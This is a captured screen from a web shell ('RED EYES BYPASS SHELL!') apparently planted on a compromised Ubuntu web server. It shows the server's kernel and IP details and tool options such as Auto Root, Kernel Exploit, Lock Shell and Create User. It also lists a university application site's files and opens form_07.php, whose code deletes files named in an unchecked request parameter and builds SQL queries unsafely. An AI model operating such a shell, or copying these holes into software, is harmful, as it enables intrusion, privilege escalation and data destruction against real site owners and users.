Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
grad /
apply /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
PDF
[ DIR ]
drwxr-xr-x
Upload_File
[ DIR ]
drwxrwxrwx
conn
[ DIR ]
drwxr-xr-x
file
[ DIR ]
drwxr-xr-x
fpdf_20231021
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
PDF01.php
17.92
KB
-rwxr-xr-x
_TT_FN.php
201
B
-rwxr-xr-x
form_00.php
21.52
KB
-rwxr-xr-x
form_01.php
13.92
KB
-rwxr-xr-x
form_02.php
23.02
KB
-rwxr-xr-x
form_03.php
28.4
KB
-rwxr-xr-x
form_04.php
2.88
KB
-rwxr-xr-x
form_05.php
364
B
-rwxr-xr-x
form_06.php
3.63
KB
-rwxr-xr-x
form_07.php
2.14
KB
-rwxr-xr-x
form_08.php
14.31
KB
-rwxr-xr-x
index.php
3.58
KB
-rwxr-xr-x
info.php
25
B
-rwxr-xr-x
menu_bar.php
1.92
KB
-rwxr-xr-x
style.php
5.35
KB
-rwxr-xr-x
upd_03.php
11.07
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : form_07.php
<?php if(isset($_REQUEST['D_FILE'])){$D_FILE= $_REQUEST['D_FILE'];}else{$D_FILE='';} If(trim($D_FILE)!='') { //echo '<script>alert(" DELETED ")</script>'; $file_pointer="Upload_File/".$D_FILE; if (file_exists($file_pointer)) { $status=unlink($file_pointer); echo '<script>alert(" DELETED ")</script>'; } Else{echo '<script>alert(" ERROR ")</script>';} } echo "<table width='98%' bgcolor='#e6e6e6'>"; echo "<tr bgcolor='RED'>"; echo "<td><font face='Arial Narrow' style='font-size: 18px' ><b>No.</font></td>"; echo "<td><font face='Arial Narrow' style='font-size: 18px' ><b>FILE NAME</font></td>"; echo "<td><font face='Arial Narrow' style='font-size: 18px' ><b>OWNER</font></td>"; echo "</tr>"; $path = 'Upload_File'; $_no=0; $dir = new DirectoryIterator(realpath($path)); foreach ($dir as $fileInfo) { if($fileInfo->isFile()) { $_no=$_no+1; // it's a file $sql="select * from rgrad_661012_001 "; $sql.=" where file001='".trim($fileInfo)."' "; $sql.=" or file002='".trim($fileInfo)."' "; $sql.=" or file003='".trim($fileInfo)."' "; $sql.=" or file004='".trim($fileInfo)."' "; $sql.=" or file005='".trim($fileInfo)."' "; $sql.=" or file006='".trim($fileInfo)."' "; $sql.=" or file007='".trim($fileInfo)."' "; $result=mysqli_query($con,$sql); $row12=mysqli_fetch_array($result,MYSQLI_ASSOC); $D_rid=$row12['rid']; //If(trim($D_rid)==''){$mrid=1;}Else{ $mrid=$mrid+1;} $name_th=$row12['name_th']; If(trim($name_th)==''){$name_th="<a href='index.php?frm07=active&D_FILE=$fileInfo' title='Delete file' style='text-decoration:none'><img src='images/_bin.png' width='24'></a>";} $_fn_link="<a href='Upload_File/$fileInfo' title='open file' target='_blank' style='text-decoration:none'>"; echo "<tr bgcolor='#ffffff'>"; echo "<td><font face='Arial Narrow' style='font-size: 16px' >".$_no."</font></td>"; echo "<td>$_fn_link<font face='Arial Narrow' style='font-size: 16px' >".$fileInfo."</font></a></td>"; echo "<td><font face='Arial Narrow' style='font-size: 16px' >".$name_th."</font></td>"; echo "</tr>"; $_fn_link=""; } } echo "</table>"; ?>
Close